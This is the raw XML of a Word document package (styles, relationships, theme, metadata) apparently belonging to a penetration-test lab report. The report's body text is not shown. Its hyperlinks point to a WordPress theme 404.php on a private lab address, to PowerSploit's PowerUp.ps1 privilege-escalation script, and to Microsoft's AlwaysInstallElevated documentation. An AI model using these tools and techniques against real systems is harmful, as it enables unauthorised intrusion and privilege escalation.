    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="TOC 1"/>
    <w:pPr>
      <w:keepNext w:val="false"/>
      <w:keepLines w:val="false"/>
      <w:pageBreakBefore w:val="false"/>
      <w:widowControl/>
      <w:shd w:val="clear" w:fill="auto"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="right" w:pos="9340" w:leader="dot"/>
      </w:tabs>
      <w:suppressAutoHyphens w:val="true"/>
      <w:overflowPunct w:val="false"/>
      <w:bidi w:val="0"/>
      <w:snapToGrid w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="288" w:before="0" w:after="100"/>
      <w:jc w:val="start"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
      <w:b w:val="false"/>
      <w:bCs w:val="false"/>
      <w:i w:val="false"/>
      <w:iCs w:val="false"/>
      <w:caps w:val="false"/>
      <w:smallCaps w:val="false"/>
      <w:strike w:val="false"/>
      <w:dstrike w:val="false"/>
      <w:outline w:val="false"/>
      <w:emboss w:val="false"/>
      <w:imprint w:val="false"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="0"/>
      <w:w w:val="100"/>
      <w:kern w:val="0"/>
      <w:position w:val="0"/>
      <w:sz w:val="26"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="22"/>
      <w:u w:val="none"/>
      <w:shd w:fill="auto" w:val="clear"/>
      <w:vertAlign w:val="baseline"/>
      <w:em w:val="none"/>
      <w:lang w:val="en-US" w:eastAsia="en-ZA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="TOC 2"/>
    <w:pPr>
      <w:keepNext w:val="false"/>
      <w:keepLines w:val="false"/>
      <w:pageBreakBefore w:val="false"/>
      <w:widowControl/>
      <w:shd w:val="clear" w:fill="auto"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="right" w:pos="9560" w:leader="dot"/>
      </w:tabs>
      <w:suppressAutoHyphens w:val="true"/>
      <w:overflowPunct w:val="false"/>
      <w:bidi w:val="0"/>
      <w:snapToGrid w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="288" w:before="0" w:after="100"/>
      <w:ind w:hanging="0" w:start="220" w:end="0"/>
      <w:jc w:val="start"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
      <w:b w:val="false"/>
      <w:bCs w:val="false"/>
      <w:i w:val="false"/>
      <w:iCs w:val="false"/>
      <w:caps w:val="false"/>
      <w:smallCaps w:val="false"/>
      <w:strike w:val="false"/>
      <w:dstrike w:val="false"/>
      <w:outline w:val="false"/>
      <w:emboss w:val="false"/>
      <w:imprint w:val="false"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="0"/>
      <w:w w:val="100"/>
      <w:kern w:val="0"/>
      <w:position w:val="0"/>
      <w:sz w:val="24"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:val="none"/>
      <w:shd w:fill="auto" w:val="clear"/>
      <w:vertAlign w:val="baseline"/>
      <w:em w:val="none"/>
      <w:lang w:val="en-US" w:eastAsia="en-ZA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Body">
    <w:name w:val="Body"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="false"/>
      <w:keepLines w:val="false"/>
      <w:pageBreakBefore w:val="false"/>
      <w:widowControl/>
      <w:shd w:val="clear" w:fill="auto"/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:overflowPunct w:val="false"/>
      <w:bidi w:val="0"/>
      <w:snapToGrid w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:jc w:val="start"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b w:val="false"/>
      <w:bCs w:val="false"/>
      <w:i w:val="false"/>
      <w:iCs w:val="false"/>
      <w:caps w:val="false"/>
      <w:smallCaps w:val="false"/>
      <w:strike w:val="false"/>
      <w:dstrike w:val="false"/>
      <w:outline w:val="false"/>
      <w:emboss w:val="false"/>
      <w:imprint w:val="false"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="0"/>
      <w:w w:val="100"/>
      <w:kern w:val="0"/>
      <w:position w:val="0"/>
      <w:sz w:val="24"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:u w:val="none"/>
      <w:shd w:fill="auto" w:val="clear"/>
      <w:vertAlign w:val="baseline"/>
      <w:em w:val="none"/>
      <w:lang w:val="en-ZA" w:eastAsia="en-ZA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="false"/>
      <w:keepLines w:val="false"/>
      <w:pageBreakBefore w:val="false"/>
      <w:widowControl/>
      <w:shd w:val="clear" w:fill="auto"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
      </w:tabs>
      <w:suppressAutoHyphens w:val="true"/>
      <w:overflowPunct w:val="false"/>
      <w:bidi w:val="0"/>
      <w:snapToGrid w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="200"/>
      <w:ind w:hanging="0" w:start="720" w:end="0"/>
      <w:jc w:val="start"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
      <w:b w:val="false"/>
      <w:bCs w:val="false"/>
      <w:i w:val="false"/>
      <w:iCs w:val="false"/>
      <w:caps w:val="false"/>
      <w:smallCaps w:val="false"/>
      <w:strike w:val="false"/>
      <w:dstrike w:val="false"/>
      <w:outline w:val="false"/>
      <w:emboss w:val="false"/>
      <w:imprint w:val="false"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="0"/>
      <w:w w:val="100"/>
      <w:kern w:val="0"/>
      <w:position w:val="0"/>
      <w:sz w:val="22"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:u w:val="none"/>
      <w:shd w:fill="auto" w:val="clear"/>
      <w:vertAlign w:val="baseline"/>
      <w:em w:val="none"/>
      <w:lang w:val="en-US" w:eastAsia="en-ZA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="TOC 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
      </w:tabs>
      <w:suppressAutoHyphens w:val="false"/>
      <w:spacing w:before="0" w:after="100"/>
      <w:ind w:hanging="0" w:start="480" w:end="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableContents">
    <w:name w:val="Table Contents"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl w:val="false"/>
      <w:suppressLineNumbers/>
      <w:suppressAutoHyphens w:val="false"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC11">
    <w:name w:val="TOC 11"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="true"/>
      <w:spacing w:before="0" w:after="100"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC21">
    <w:name w:val="TOC 21"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
      </w:tabs>
      <w:suppressAutoHyphens w:val="true"/>
      <w:spacing w:before="0" w:after="100"/>
      <w:ind w:hanging="0" w:start="200" w:end="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC31">
    <w:name w:val="TOC 31"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
      </w:tabs>
      <w:suppressAutoHyphens w:val="true"/>
      <w:spacing w:before="0" w:after="100"/>
      <w:ind w:hanging="0" w:start="400" w:end="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="TOC 4"/>
    <w:basedOn w:val="Index"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="numbering" w:styleId="NoList1">
    <w:name w:val="No List_1"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="numbering" w:styleId="ImportedStyle1">
    <w:name w:val="Imported Style 1"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="numbering" w:styleId="ImportedStyle2">
    <w:name w:val="Imported Style 2"/>
    <w:qFormat/>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image" Target="media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.232.55/shenzi/wp-content/themes/twentytwenty/404.php" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:kali@192.168.119.164" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:UWyBGeTp3Bhw7f@10.5.5.30" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.jpeg"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/>
</Relationships>
</file>

<file path=word/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="Office">
  <a:themeElements>
    <a:clrScheme name="LibreOffice">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="ffffff"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="ffffff"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="18a303"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="0369a3"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="a33e03"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="8e03a3"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="c99c00"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="c9211e"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0000ee"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="551a8b"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Office">
      <a:majorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface="DejaVu Sans" pitchFamily="0" charset="1"/>
        <a:cs typeface="DejaVu Sans" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface="DejaVu Sans" pitchFamily="0" charset="1"/>
        <a:cs typeface="DejaVu Sans" pitchFamily="0" charset="1"/>
      </a:minorFont>
    </a:fontScheme>
    <a:fmtScheme>
      <a:fillStyleLst>
        <a:solidFill>
          <a:schemeClr val="phClr"/>
        </a:solidFill>
        <a:solidFill>
          <a:schemeClr val="phClr"/>
        </a:solidFill>
        <a:solidFill>
          <a:schemeClr val="phClr"/>
        </a:solidFill>
      </a:fillStyleLst>
      <a:lnStyleLst>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:prstDash val="solid"/>
          <a:miter/>
        </a:ln>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:prstDash val="solid"/>
          <a:miter/>
        </a:ln>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:prstDash val="solid"/>
          <a:miter/>
        </a:ln>
      </a:lnStyleLst>
      <a:effectStyleLst>
        <a:effectStyle>
          <a:effectLst/>
        </a:effectStyle>
        <a:effectStyle>
          <a:effectLst/>
        </a:effectStyle>
        <a:effectStyle>
          <a:effectLst/>
        </a:effectStyle>
      </a:effectStyleLst>
      <a:bgFillStyleLst>
        <a:solidFill>
          <a:schemeClr val="phClr"/>
        </a:solidFill>
        <a:solidFill>
          <a:schemeClr val="phClr"/>
        </a:solidFill>
        <a:solidFill>
          <a:schemeClr val="phClr"/>
        </a:solidFill>
      </a:bgFillStyleLst>
    </a:fmtScheme>
  </a:themeElements>
</a:theme>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template/>
  <TotalTime>40</TotalTime>
  <Application>LibreOffice/24.2.3.2$MacOSX_AARCH64 LibreOffice_project/433d9c2ded56988e8a90e6b2e771ee4e6a5ab2ba</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>26</Pages>
  <Words>2414</Words>
  <Characters>14279</Characters>
  <CharactersWithSpaces>16708</CharactersWithSpaces>
  <Paragraphs>235</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2023-11-24T20:00:00Z</dcterms:created>
  <dc:creator>irtza ch</dc:creator>
  <dc:description/>
  <dc:language>en-CA</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-21T09:50:50Z</dcterms:modified>
  <cp:revision>15</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>